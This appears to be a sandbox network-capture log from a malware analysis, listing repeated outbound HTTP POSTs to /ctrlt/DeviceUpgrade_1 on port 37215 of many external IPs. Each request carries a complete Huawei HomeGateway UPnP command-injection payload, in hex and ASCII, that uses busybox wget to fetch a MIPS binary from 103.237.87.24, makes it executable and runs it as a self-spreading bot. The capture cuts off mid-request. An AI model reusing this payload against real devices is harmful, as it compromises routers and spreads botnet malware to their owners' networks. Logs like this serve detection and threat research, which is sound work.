                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1184192.168.2.1341650197.250.30.24137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445816040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1185192.168.2.1349500197.76.65.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445832968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1186192.168.2.134197242.17.28.16737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445847988 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1187192.168.2.135336474.132.117.17537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.445866108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1188192.168.2.1336872157.206.15.15737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446314096 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1189192.168.2.1352008197.2.236.9537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446336985 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1190192.168.2.133499441.163.18.237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446372032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1191192.168.2.1358386188.228.161.12737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446389914 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1192192.168.2.134283841.82.8.24537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446399927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1193192.168.2.1354904197.4.234.24037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.446423054 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 